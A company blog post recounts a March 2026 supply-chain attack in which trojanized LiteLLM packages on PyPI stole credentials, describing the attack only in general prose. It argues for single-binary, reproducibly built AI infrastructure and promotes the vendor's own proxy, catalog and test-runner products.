← Back to blog

Your AI infrastructure shouldn't be a pip install

On March 24, 2026, two versions of LiteLLM on PyPI shipped with a credential stealer. For roughly three hours, anyone who ran pip install litellm on one of the bad versions handed their SSH keys, cloud credentials, environment files, and anything else sitting on the box to a group that calls itself TeamPCP.

The part that should bother you isn't that it happened. The part that should bother you is that it was always going to.

What actually happened

Five days before the LiteLLM release, on March 19, TeamPCP rewrote a git tag in the trivy-action GitHub Action repository so the tag pointed at a malicious release. Many CI pipelines use that action. LiteLLM was one of them. When the next LiteLLM release ran, the trojanized action exfiltrated the maintainer's PyPI credentials.

On March 24 at 10:39 UTC, TeamPCP used those credentials to publish litellm==1.82.7 and litellm==1.82.8. Both wheels included a file called litellm_init.pth. The .pth mechanism is a Python feature: any .pth file in a site-packages directory runs its contents every time the Python interpreter starts. The payload was three stages. First, harvest credentials. Then, attempt Kubernetes lateral movement via privileged pods. Then, install a persistent backdoor over systemd that phoned home for further payloads.

PyPI quarantined the packages within about three hours. In that window, the bad versions were pulled down roughly 119,000 times. For context, LiteLLM ships on the order of 3.4 million installs per day. The window was the cap on the damage, not the intent.

LiteLLM's team posted a security notice the same day, rotated credentials, and worked with PyPI on the post-mortem. The malicious code wasn't theirs. Their response was clean.

This isn't a LiteLLM problem

The point isn't that LiteLLM got hit. Anyone could have been hit. The point is the shape of what got hit.

When your AI infrastructure is a Python package, the thing that stands between attackers and your production is PyPI. Not PyPI the registry. PyPI as an ecosystem: every maintainer credential, every CI action, every transitive dependency, every tag you trust. None of that has anything to do with AI specifically. It has to do with the fact that Python packages run arbitrary code at install, at import, and at interpreter startup. The registry they install from is a dependency graph you didn't consent to.

This shape repeats in three places across an enterprise AI stack. The consequences differ at each layer.

Three layers, one constraint

An AI agent needs three pieces of infrastructure to do useful work safely. It needs to find a tool, call it under governance, and verify the contract still holds. Catalog, gateway, tests. Each one has its own supply-chain blast radius.

The gateway is the most obvious case. Every request hits it first, plaintext, authenticated, with whatever context the application attached. Compromising the gateway compromises everything. That's the property of a gateway. If somebody with a stolen credential on a dependency-of-a-dependency can put code on the box, they're in front of your traffic.

The catalog is the case nobody talks about yet, and it's worse. A catalog distributes the specs that tell an AI agent how to call a tool. If the catalog's supply chain is compromised, the attacker isn't sitting in front of your traffic. They're sitting inside the agent's instruction set. Every install of a tool spec is an opportunity to redirect, exfiltrate, or rewrite the very prompts and parameters the agent is about to send to its model. A catalog package compromised the way LiteLLM was compromised would be a more interesting incident, not a less interesting one.

The test runner is the quiet case. Test runners read your repository, your config, your CI secrets, and run against staging endpoints that often share auth with production. A trojanized test runner picks up the same blast radius as a trojanized CI action - which is exactly the vector that compromised LiteLLM's release in the first place.

All three are infrastructure, not application code. None of them is something you let your developers pip install into a virtualenv and forget about.

What a controlled supply chain looks like

The bar is boring and old. nginx and HAProxy have met it for twenty years:

  • One artifact. A single binary, or a signed container image. Not a zip of hundreds of files that auto-execute at import.
  • Built from a tagged commit in a repository you can audit.
  • Built reproducibly. Same commit, same artifact. Verifiable by someone other than the publisher.
  • Pinned, checksummed dependencies resolved at build time, not at install time, not at startup.
  • Runtime doesn't fetch code. The thing that starts in production is the thing you built. No plugins pulled from a public registry on first boot.
  • Narrow interpreter surface. No runtime eval, no config that executes user-supplied code in the main process, no .pth-style auto-load mechanisms.

Every one of those is a direct control on the attack class TeamPCP used. None are novel. They're what production infrastructure has looked like for two decades.

The Python AI stack broke that baseline for a good reason: shipping a library was the fastest way to reach the audience that existed in 2023 and 2024. Developers wanted one pip install that spoke to every model. Fine. But the shape that works for a Python library inside an application doesn't scale to infrastructure sitting in front of production traffic, distributing executable specs to agents, or running with CI credentials. The March incident was a mechanical consequence of running one at the wrong layer.

What Soap Bucket builds, on this axis

All three pieces of our stack ship under the same constraint.

SBproxy is a single static binary. No interpreter on the execution path, no package manager at startup, no plugins fetched at first boot. When it starts, it parses YAML and binds ports. That's it.

clictl ships as a single binary too, and the catalog it distributes is shaped to the same rule. Tool specs are static, declarative, and sandboxed: network scope, filesystem scope, and environment access are all declared in the spec and enforced at runtime. A tool spec can't ship arbitrary install-time code, because the spec format doesn't have one. The catalog is data, not a Python package that runs on import.

mcptest ships as a single binary, and the YAML test files it runs are validated by a JSON Schema at load time. No plugin loader, no .pth-equivalent hook, no eval. If a malicious test file lands in your repo, it can fail your CI loudly. It cannot exfiltrate your secrets.

Releases for all three are cut from tagged commits in public repos. The binaries carry version, commit hash, and build date linked in at build time. Dependencies are pinned and checksummed in the build manifest. You can vendor the full dependency tree, audit it offline, and reproduce each binary from the tag.

None of this makes us immune. Module registries can be compromised, toolchains can be compromised, CI can be compromised. What we're claiming is that the shape of the attack surface is auditable. One artifact per product. One upstream. One dependency graph that resolves at build time, not install time. Every link in that chain is a file you can fingerprint and a commit you can read.

What to do right now

If you ran pip install litellm during the March window, rotate every credential that ever sat on that host, inspect your cluster for the systemd persistence, and read the Snyk technical writeup. The acute incident is over.

If you're picking AI infrastructure this quarter, the question to ask isn't "is your code secure." The question is: when I run your gateway, catalog, or test runner in production, what's the full set of things that have to be trustworthy, and how do I verify each one?

If the honest answer involves a Python interpreter, pip, PyPI, some number of transitive packages, the CI actions those packages use, and every maintainer credential behind them, write that down. That's your trust boundary. Compare it to the one you have for nginx or Envoy or any other production proxy you already run. The gap is the thing the March incident taught everyone about, the hard way.

We didn't set out to have opinions about supply chain. We set out to build infrastructure that runs in front of real traffic, in front of real agents, in front of real CI pipelines. The shape fell out of that.